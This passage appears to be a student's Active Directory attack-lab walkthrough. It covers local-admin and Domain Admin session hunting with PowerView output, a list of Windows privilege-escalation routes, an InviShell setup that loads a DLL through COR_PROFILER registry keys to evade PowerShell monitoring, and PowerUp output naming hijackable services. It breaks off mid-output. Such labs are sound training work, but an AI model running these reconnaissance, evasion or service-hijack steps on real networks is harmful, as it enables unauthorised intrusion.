The current user has Local Admin access on: DCORP-ADMINSRV


SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 20348
RegisteredUser : Windows User
SerialNumber : 00454-30000-00000-AA239
Version : 10.0.20348

The current user has Local Admin access on: DCORP-STD163

Find-PSRemotingLocalAdminAccess.ps1 – Works in the same way as Find-WMILocalAdminAccess.ps1, but checks access over PowerShell Remoting instead of WMI.

PS C:\Users\student163> . C:\Ad\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Users\student163> Find-PSRemotingLocalAdminAccess -ComputerFile
"C:\Users\student163\Desktop\shared\Computers.txt"
dcorp-adminsrv

Find computers where a domain admin has a session

Find-DomainUserLocation – By default, this function queries the Domain Controller for the list of Domain Admins (Get-DomainGroupMember), gets the list of computers (Get-DomainComputer) and then lists the sessions and logged-on users (Get-NetSession or Get-NetLoggedon) on each machine. We can also use this function to find the sessions of members of any other group by passing that group to the UserGroupIdentity parameter.

From Server 2019 onwards, this function requires local administrative privileges on the target machine to list its sessions.
PS C:\Users\student163> Find-DomainUserLocation -Verbose
VERBOSE: [Find-DomainUserLocation] Querying for all computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string:
(&(objectCategory=group)(|(samAccountName=Domain
Admins)))
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from 'CN=svc
admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (|(distinguishedname=CN=svc
admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(distinguishedname=CN=svc
admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetUsers length: 2
VERBOSE: [Find-DomainUserLocation] Using threading with threads: 20
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed
PS C:\Users\student163> Find-DomainUserLocation -UserGroupIdentity "RDPUsers" -Verbose
VERBOSE: [Find-DomainUserLocation] Querying for all computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string:
(&(objectCategory=group)(|(samAccountName=RDPUsers)))
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student180,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student180,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student180,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student179,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student179,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student179,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student178,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student178,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student178,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student177,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student177,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student177,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student176,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student176,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student176,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student175,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student175,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student175,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student174,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student174,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student174,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student173,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student173,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student173,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student172,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student172,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student172,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student171,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student171,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student171,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student170,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student170,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student170,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student169,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student169,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student169,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student168,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student168,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student168,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student167,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student167,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student167,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student166,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student166,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student166,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student165,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student165,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student165,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student164,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student164,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student164,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student162,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student162,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student162,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student161,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student161,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student161,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=studentadmin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=studentadmin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=studentadmin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetUsers length: 21
VERBOSE: [Find-DomainUserLocation] Using threading with threads: 20
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Find computers where a domain admin has a session and the current user has admin privileges on them:
PS C:\Users\student163> Find-DomainUserLocation -CheckAccess

With the Stealth option, the function checks only the File Servers and Distributed File Servers.
Local Privilege Escalation
It is not always necessary to have admin privileges on our foothold. However, having them definitely helps.
There are various ways in which we can escalate our privileges on a Windows box.

• Missing Patches
• Automated Deployment and Autologon passwords in clear text
• Always Install Elevated (any user can run an MSI as SYSTEM)
• Misconfigured Services
• DLL Hijacking
• NTLM Relaying

We can use the following tools to enumerate privilege escalation paths:

• PowerUp - https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
• Privesc - https://github.com/enjoiz/Privesc/blob/master/privesc.ps1
• winPEAS - https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASps1/winPEAS.ps1

In our lab, we will use PowerUp to check the possible paths for privilege escalation. In real assessments it is recommended to use winPEAS.
C:\Users\student163>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Users\student163>set COR_ENABLE_PROFILING=1

C:\Users\student163>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\Users\student163>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student163> . C:\Ad\Tools\PowerUp.ps1
PS C:\Users\student163> Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True

[*] Checking service executable and argument permissions...

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True

ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False

ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False

ServiceName : edgeupdatem
